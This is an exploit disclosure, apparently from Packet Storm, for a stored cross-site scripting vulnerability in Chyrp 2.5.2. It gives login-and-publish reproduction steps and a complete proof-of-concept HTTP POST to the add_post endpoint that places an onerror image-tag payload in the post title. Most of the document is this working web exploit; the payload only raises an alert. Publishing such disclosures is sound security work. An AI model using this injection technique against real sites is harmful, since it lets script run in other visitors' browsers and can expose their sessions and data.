Share
## https://sploitus.com/exploit?id=PACKETSTORM:178559
# Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)  
# Date: 2024-04-24  
# Exploit Author: Ahmet รœmit BAYRAM  
# Vendor Homepage: https://github.com/chyrp/  
# Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip  
# Version: 2.5.2  
# Tested on: MacOS  
  
### Steps to Reproduce ###  
  
- Login from the address: http://localhost/chyrp/?action=login.  
- Click on 'Write'.  
- Type this payload into the 'Title' field: "><img src=x onerror=alert(  
"Stored")>  
- Fill in the 'Body' area and click 'Publish'.  
- An alert message saying "Stored" will appear in front of you.  
  
### PoC Request ###  
  
POST /chyrp/admin/?action=add_post HTTP/1.1  
Host: localhost  
Cookie: ChyrpSession=c4194c16a28dec03e449171087981d11;  
show_more_options=true  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)  
Gecko/20100101 Firefox/124.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,  
*/*;q=0.8  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate, br  
Content-Type: multipart/form-data;  
boundary=---------------------------28307567523233313132815561598  
Content-Length: 1194  
Origin: http://localhost  
Referer: http://localhost/chyrp/admin/?action=write_post  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Te: trailers  
Connection: close  
  
-----------------------------28307567523233313132815561598  
Content-Disposition: form-data; name="title"  
  
"><img src=x onerror=alert("Stored")>  
-----------------------------28307567523233313132815561598  
Content-Disposition: form-data; name="body"  
  
<p>1337</p>  
-----------------------------28307567523233313132815561598  
Content-Disposition: form-data; name="status"  
  
public  
-----------------------------28307567523233313132815561598  
Content-Disposition: form-data; name="slug"  
  
  
-----------------------------28307567523233313132815561598  
Content-Disposition: form-data; name="created_at"  
  
04/24/24 12:31:57  
-----------------------------28307567523233313132815561598  
Content-Disposition: form-data; name="original_time"  
  
04/24/24 12:31:57  
-----------------------------28307567523233313132815561598  
Content-Disposition: form-data; name="trackbacks"  
  
  
-----------------------------28307567523233313132815561598  
Content-Disposition: form-data; name="feather"  
  
text  
-----------------------------28307567523233313132815561598  
Content-Disposition: form-data; name="hash"  
  
11e11aba15114f918ec1c2e6b8f8ddcf  
-----------------------------28307567523233313132815561598--